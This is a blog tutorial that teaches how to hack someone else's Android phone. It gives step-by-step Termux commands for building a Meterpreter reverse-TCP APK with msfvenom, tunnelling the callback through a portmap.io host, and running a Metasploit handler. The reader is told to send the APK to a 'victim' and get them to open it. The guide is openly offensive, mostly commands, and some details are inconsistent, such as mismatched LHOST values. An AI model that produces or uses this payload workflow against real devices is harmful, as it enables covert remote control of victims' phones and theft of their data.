Banner ads

how to hack android phone

how to hack android phoneHi guys' if you are searching for how to hack android phone and searching for the best article to get the best explanation about how to hack android phone. Then you are at the right place.

Today I'm here going to share the step by step tutorial about "how to hack android phone". By this article, you can get a lot of about how to hack android phone, how to hack android phone by sending a link, hacking android from metasploit in termux. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.


how to hack android phone
how to hack android phone


how to hack android phone

Hello, guy's how are you all I hope you guys were fine and enjoying reading our website posts. So guys today we are going to know about how to hack an android phone. As we know hacking android devices is not a child's play and easy but still we can do you know-how, we can take advantage of loopholes or vulnerabilities in android os, In simple word's we can hack android from android device itself but need some knowledge of exploiting and payload creating and crypting (bypassing the payloads from antivirus). So after learning all these things you can hack any android in seconds That's all.

how to hack android phone by sending a link

Hacking android from the link is possible but the links are nowadays getting banned because of malicious issues and some of the social media platforms like Instagram, Facebook, Twitter, Snapchat, they are detecting malicious links like Payload links, Phishing links etc... So if incase we bypass the links from these detecting bot's we can rule the victim's device so in this section I will just share how to hack an android phone from Metasploit in termux for a lifetime. But in the next post, I will try to post about hacking android from just link so till wait for an amazing post.

hacking android from metasploit in termux

1. first open chrome browser and enable the desktop mode by taping three dots on top the right side of the browser and enable desktop mod after that open portmap.io website after website opened just register on that and sign in after all the login process on top of the website you can see a CONFIGURATION click on that and after that, a new window open in that you can see 4 small boxes in 1 box you can add any name, in 2nd box, select OPEN VPN, in 3rd box select TCP after that, leave the 4th box don't touch it .... now after that you can see GENERATE at the end of the page just click on the download button and download automatically starts now here you can see a small file has been downloaded after that 

2. now at the end of the same page you can see CREATE button just click on that ... 

3. After that at the top of the web, you can see MAPPING RULES just click on it, after that a new window opens and in that just add any number in the place PORT ON YOUR PC after that click on create. 

4. now go to play store and search OPEN VPN FOR ANDROID and download it after that open app and at the top right side you can see Import BUTTON now click on that and select xuberpack.first.ovpn this type of file in your storage and after that click RIGHT button on the top right side and after that you can see home page of app now just click on the noob hackers xuberpack.first.ovpn a new message arrives and asks you to allow now allow that by clicking OK after that a tunnel starts 

5. now open portmap.io web in chrome and you can see a tunnel which you created now in that copy these things ex :- hulkbro-35272.portmap.host and copy PORT:- 35272 and after that paste then in this command which you can see in the video

ex :- ./msfvenom -p android/meterpreter/ reverse_tcp LHOST=xuberpack-35272.portmap.host LPORT=35272 R > /sdcard/simple.apk

After that now open termux app and follow these commands properly 

$ ls 

$ cd metasploit-framework 

$ ./msfvenom -p android/meterpreter/ reverse_tcp LHOST=xuberpack-35272.portmap.host LPORT=35272 R > /sdcard/simple.apk 

Wait until payload ready ....after that follow this 

(open 1st session) 

$ ./msfconsole 

now open new (2nd) session and apply these commands 

$ pg_ctl -D $PREFIX/var/lib/postgresql start

Now come back to (1st session) in which you opened Metasploit now apply these commands 

$ db_status 

$ use exploit/multi/handler 

$ set payload android/meterpreter/ reverse_tcp 

$ set lhost 35272.portmap.host 

$ set lport (the port you have chosen) 

$ exploit 

now go to ur internal storage and search the payload which you have been created now send this to your victim mobile and let him open it .. now the work has been done you can see the session started message now you can do whatever you like to do .....

Hack android Metasploit burrow in pdf version

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here



 websites I used in the video

Click Here


watch the practical video here


Watch now


 Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use contact us page, please........

Errors or issue reasons


  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience


    "Solution for all these problems is watching a video without skip until the end"

    Link for Script/Tool will be available below
    Click On Below Button

    Post a Comment

    0 Comments